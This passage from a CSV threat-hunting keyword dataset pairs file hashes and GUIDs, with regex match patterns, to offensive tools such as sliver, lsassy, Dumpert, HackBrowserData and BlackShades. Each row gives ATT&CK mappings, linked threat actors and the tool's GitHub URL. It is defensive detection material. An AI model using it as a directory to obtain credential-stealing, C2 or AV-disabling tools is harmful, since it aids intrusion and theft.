Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","26094" "*4ae656fa671d794cdf9780b1dbf9c2a097f81f7c349f2e18fbb2535d495feefd*",".{0,1000}4ae656fa671d794cdf9780b1dbf9c2a097f81f7c349f2e18fbb2535d495feefd.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","26096" "*4ae67074c52164526a351037946fd4deacd275b5fbdea7e49845e9f201ac151d*",".{0,1000}4ae67074c52164526a351037946fd4deacd275b5fbdea7e49845e9f201ac151d.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","26097" "*4aea1d1fd9ccaeb832026cadde29adfc5bc5a566e423b201747b101c8ca4281c*",".{0,1000}4aea1d1fd9ccaeb832026cadde29adfc5bc5a566e423b201747b101c8ca4281c.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","26099" "*4aede7350521d2a3d0975833db870f94c50c8d46c28d8b14f930619e35b4b07e*",".{0,1000}4aede7350521d2a3d0975833db870f94c50c8d46c28d8b14f930619e35b4b07e.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","#filehash","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","26101" "*4af84ffd1badb65ce92e7d89e711b055e363db8bb59d8de5592d1215c626317d*",".{0,1000}4af84ffd1badb65ce92e7d89e711b055e363db8bb59d8de5592d1215c626317d.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","0","#filehash","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","26104" 
"*4b0ff1bd0004ab3d3ec7fe99d489246671adf95aaaf8750cb413bb77acfbfc18*",".{0,1000}4b0ff1bd0004ab3d3ec7fe99d489246671adf95aaaf8750cb413bb77acfbfc18.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","26106" "*4b10c2daee126f80f9c19d018cbbd7d2f06c05f737a16c38e9aff1bfb951b2f4*",".{0,1000}4b10c2daee126f80f9c19d018cbbd7d2f06c05f737a16c38e9aff1bfb951b2f4.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26107" "*4b1965fb28c50aff632bae51e2bfee153009797f2b576932076d3472f984ae66*",".{0,1000}4b1965fb28c50aff632bae51e2bfee153009797f2b576932076d3472f984ae66.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26108" "*4b1b36706c5306f0084713e926888ffbe0fe9bfbf1b0bdfeef950b6dc531cb18*",".{0,1000}4b1b36706c5306f0084713e926888ffbe0fe9bfbf1b0bdfeef950b6dc531cb18.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26110" "*4b1f30bb50fd9df218259854bfd47b7b2b9e818bdb64909e0105f120a2ca0014*",".{0,1000}4b1f30bb50fd9df218259854bfd47b7b2b9e818bdb64909e0105f120a2ca0014.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","26111" 
"*4b23fd7b0179a37fe15bf38ea9ccb0202202d36dcaa882c58a66c1979d37e92c*",".{0,1000}4b23fd7b0179a37fe15bf38ea9ccb0202202d36dcaa882c58a66c1979d37e92c.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","0","#filehash","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","26114" "*4b2554d8616a20ca49097ec116c63dee9f400d532318b62d05d91590ce34ee49*",".{0,1000}4b2554d8616a20ca49097ec116c63dee9f400d532318b62d05d91590ce34ee49.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","26116" "*4b25648a17919f5d25080b160d998f02ace0c1fd3aab334dfe8ea53612cca954*",".{0,1000}4b25648a17919f5d25080b160d998f02ace0c1fd3aab334dfe8ea53612cca954.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","26117" "*4B2E3A60-9A8F-4F36-8692-14ED9887E7BE*",".{0,1000}4B2E3A60\-9A8F\-4F36\-8692\-14ED9887E7BE.{0,1000}","offensive_tool_keyword","FormThief","Spoofing desktop login applications with WinForms and WPF","T1204.002 - T1056.004 - T1071.001","TA0001 - 
TA0006","N/A","N/A","Credential Access","https://github.com/mlcsec/FormThief","1","0","#GUIDproject","N/A","8","2","173","31","2024-02-19T22:40:09Z","2024-02-19T22:34:07Z","26119" "*4b3201cd6976efb471ed4b5f567d9574d0a61871e0aa13cda59b1b8a82852f03*",".{0,1000}4b3201cd6976efb471ed4b5f567d9574d0a61871e0aa13cda59b1b8a82852f03.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26120" "*4B37C8BF-B1C1-4025-93C6-C3B501CBB152*",".{0,1000}4B37C8BF\-B1C1\-4025\-93C6\-C3B501CBB152.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","#GUIDproject","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","26123" "*4b4a532b9efe70d220a086a839b59bf80d00368d3f821fb7f81f92eeb9ba3edc*",".{0,1000}4b4a532b9efe70d220a086a839b59bf80d00368d3f821fb7f81f92eeb9ba3edc.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","26124" "*4b532e80f16904176fc50b312ca8114d8ece3ec594cb34a29d7e5e0d767dca59*",".{0,1000}4b532e80f16904176fc50b312ca8114d8ece3ec594cb34a29d7e5e0d767dca59.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP 
connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","26126" "*4b56fdc12b0f2b0c1e1b5f2e4e5fceb6794d4446587fbee895847d2eae8de930*",".{0,1000}4b56fdc12b0f2b0c1e1b5f2e4e5fceb6794d4446587fbee895847d2eae8de930.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","26127" "*4b591b30acc45d581d7500bd107dea8155d325d3d8147d9cd4bd6c6aa3db7a98*",".{0,1000}4b591b30acc45d581d7500bd107dea8155d325d3d8147d9cd4bd6c6aa3db7a98.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","26128" "*4b611d6813e8cc17dbc5d7ad3359e3f8aa65fee383e6423b846a26dad0f03ad2*",".{0,1000}4b611d6813e8cc17dbc5d7ad3359e3f8aa65fee383e6423b846a26dad0f03ad2.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26129" 
"*4b6c367f1ff92fcd77e8708461c2dbe215a6c44e167089efd8afeee24ecadece*",".{0,1000}4b6c367f1ff92fcd77e8708461c2dbe215a6c44e167089efd8afeee24ecadece.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26130" "*4b6df010ff6834f9d493d178079730ebd03f3fefd7a1e8da6c4456f2ed8d6296*",".{0,1000}4b6df010ff6834f9d493d178079730ebd03f3fefd7a1e8da6c4456f2ed8d6296.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","26131" "*4b7a6d90bd88298bc472e3f092cb4d1f60b46f5530b0e4d3b85dd236cbd17b92*",".{0,1000}4b7a6d90bd88298bc472e3f092cb4d1f60b46f5530b0e4d3b85dd236cbd17b92.{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","0","#filehash","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","26134" "*4b7d328edcfaba732d45ab408f53cf991d87f3e0a2dc2c0adc203885a0361d52*",".{0,1000}4b7d328edcfaba732d45ab408f53cf991d87f3e0a2dc2c0adc203885a0361d52.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26136" "*4b7f6f3571fda33d3c305207518d9a7a8f328e2828f249735368beb8b6f04210*",".{0,1000}4b7f6f3571fda33d3c305207518d9a7a8f328e2828f249735368beb8b6f04210.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","26137" "*4b8997973189f7f85b4c2ad8fd3320269481d70b70c67046d0994844e5fb852a*",".{0,1000}4b8997973189f7f85b4c2ad8fd3320269481d70b70c67046d0994844e5fb852a.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","26138" "*4b999cd6a88ade1b7cd18b87d34495d4a03af9202a4f8b6a20b98f144c01d084*",".{0,1000}4b999cd6a88ade1b7cd18b87d34495d4a03af9202a4f8b6a20b98f144c01d084.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26139" "*4b9bdaff523939442961fd62acfe38c8bd379dd294d066d4770ce15e9c955e9f*",".{0,1000}4b9bdaff523939442961fd62acfe38c8bd379dd294d066d4770ce15e9c955e9f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26140" "*4b9dbffee430d20fd696391f01a748edea00b6feaef8589f3ff33b01abe1bca8*",".{0,1000}4b9dbffee430d20fd696391f01a748edea00b6feaef8589f3ff33b01abe1bca8.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","26142" "*4b9e2f5e4582b162aee0241e31482b2a50eb34712b13d2911726b3b988ccdfeb*",".{0,1000}4b9e2f5e4582b162aee0241e31482b2a50eb34712b13d2911726b3b988ccdfeb.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","26143" "*4ba56c35ad47ef4c0f778c152717296d353945b500448a332fb533ef5bdaf36e*",".{0,1000}4ba56c35ad47ef4c0f778c152717296d353945b500448a332fb533ef5bdaf36e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26145" "*4bb2d035f0972ef95a71600220648cffcc25c8f6baf5c96de7a0eafdf509ae04*",".{0,1000}4bb2d035f0972ef95a71600220648cffcc25c8f6baf5c96de7a0eafdf509ae04.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26148" "*4bb5b8961566bdbdc3787a847a55730ce32d1822677bcd7c412cf2d7f54262fd*",".{0,1000}4bb5b8961566bdbdc3787a847a55730ce32d1822677bcd7c412cf2d7f54262fd.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","0","#filehash","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","26150" "*4bb77a1ecf1a057a39bd8b6f7b3f349717eac5d32eb87df25e29aceacfa1ec7f*",".{0,1000}4bb77a1ecf1a057a39bd8b6f7b3f349717eac5d32eb87df25e29aceacfa1ec7f.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","26151" "*4bb7cf0cb193d6c553a3f11a45b8524a1ba775922e39b92197004f95509728b6*",".{0,1000}4bb7cf0cb193d6c553a3f11a45b8524a1ba775922e39b92197004f95509728b6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26152" "*4bb963704e0b986784a5d5b1ad7cc6daffc7e062fedf0025df4974e8b0478602*",".{0,1000}4bb963704e0b986784a5d5b1ad7cc6daffc7e062fedf0025df4974e8b0478602.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","26153" "*4bbc3665b5dd41184146e64b1b3d563af181600c9375d3e9d99170684a82a8ce*",".{0,1000}4bbc3665b5dd41184146e64b1b3d563af181600c9375d3e9d99170684a82a8ce.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","26155" "*4bbce282aa26a449030a398e4ff5e980137a05d91f205037ac1bb297f3c36513*",".{0,1000}4bbce282aa26a449030a398e4ff5e980137a05d91f205037ac1bb297f3c36513.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","26156" "*4bc0cedc1fa6de2b307d94dbb2bc90133a937d3fdf884a877565396e3fb0d027*",".{0,1000}4bc0cedc1fa6de2b307d94dbb2bc90133a937d3fdf884a877565396e3fb0d027.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#filehash","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","26158" "*4bc67e5404e070bce9952de907f957cb0451a92c7a0c468a73755b2947f344c6*",".{0,1000}4bc67e5404e070bce9952de907f957cb0451a92c7a0c468a73755b2947f344c6.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","26160" "*4bcb041abeeb758cbb98edcdba1d0cadc1c8fba413d100b1077688555860e930*",".{0,1000}4bcb041abeeb758cbb98edcdba1d0cadc1c8fba413d100b1077688555860e930.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a 
post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","26162" "*4bd26151318dad8f056062ca75ccffccda34afc9edea03f6dd5056bc9a961996*",".{0,1000}4bd26151318dad8f056062ca75ccffccda34afc9edea03f6dd5056bc9a961996.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","#filehash","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","26164" "*4bd5b2fdb9820e93e3b29014d3902ca9f69c0306274c8cc4723ed606116d9a50*",".{0,1000}4bd5b2fdb9820e93e3b29014d3902ca9f69c0306274c8cc4723ed606116d9a50.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26165" "*4bd863af3ba70c958caf5b048ddd90a32a54bb9ae5d3e7578e8e0f1330a7d68f*",".{0,1000}4bd863af3ba70c958caf5b048ddd90a32a54bb9ae5d3e7578e8e0f1330a7d68f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26166" "*4bdff76e56960fe9ef5cceb930d6669ec9e04ec8dceb9b5c856306abc1862f12*",".{0,1000}4bdff76e56960fe9ef5cceb930d6669ec9e04ec8dceb9b5c856306abc1862f12.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","26168" "*4be7282a5c184870c130913381641c2c531d773eec25fc810394fca9ec9c386c*",".{0,1000}4be7282a5c184870c130913381641c2c531d773eec25fc810394fca9ec9c386c.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation 
